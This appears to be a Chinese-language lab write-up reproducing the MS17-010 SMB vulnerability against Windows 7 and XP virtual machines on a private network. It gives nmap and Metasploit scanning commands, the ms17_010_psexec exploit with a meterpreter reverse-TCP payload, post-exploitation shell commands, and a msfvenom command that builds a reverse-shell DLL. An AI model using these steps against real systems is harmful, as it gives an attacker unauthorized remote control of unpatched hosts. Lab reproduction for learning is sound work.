简单得ms17-010复现

环境

攻击机:

  • Parrot Sec OS
    • 192.168.75.141
    • metasploit
    • nmap
    • postgresql

靶机:

  • 关闭防火墙,开启445端口
  • Win7 x86
    • 192.168.75.147
    • 关闭网络共享的密码保护
  • WinXP x86 EN
    • 192.168.75.133

已知ip作用nmap扫

nmap --script smb-vuln-ms17-010 192.168.75.147

之后提示有ms17-010漏洞

扫描内网ip,查看哪个ip有ms17-010漏洞

启用postgresql

sudo /etc/init.d/postgresql restart

之后创建msfdb数据库
msfdb init

打开metasploit的控制台msfconsole
msfconsole

查看是否连接数据库
db_status

运行smb模块探测内网主机445端口开放情况
use auxiliary/scanner/smb/smb_version

设置扫描的网段
set rhosts 192.168.75.2/24

设置线程
set threads 16

run

之后扫除当前网段ip后,探测ip有没有ms17-010漏洞

使用smb_ms17_010模块探测MS17-010漏洞
use auxiliary/scanner/smb/smb_ms17_010

查看选项
show options

set threads 16

设置协议端口
services -r tcp -p 445 -R

run

使用msfconsole的ms17-010

搜索漏洞
search ms17-010

使用最新漏洞
use exploit/windows/smb/ms17_010_psexec

设置被攻击的ip
set RHOST 192.168.75.147

设置自己的ip
set lhost 192.168.75.141

设置自己的端口
set lport 4444

使用payload反弹
set payload windows/meterpreter/reverse_tcp

set threads 16

开始搞事
exploit

之后成功,进入meterpreter

查看系统信息
sysinfo

得到当前路径
getwd

返回上级
cd ..

创建删除文件夹
mkdir 1/rmdir 1

创建文件
edit 1.txt

进入shell
shell

Windows用来反弹shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.75.141 LPORT=4444 -f dll > msf.dll

ERROR

使用exploit/windows/smb/ms17_010_psexec可以对Win7_x86(关闭网络共享密码保护)和winxp_sp3_EN成功

使用exploit/windows/smb/ms17_010_eternalblue可以对Win7_x64(无需网络共享密码保护)成功

0%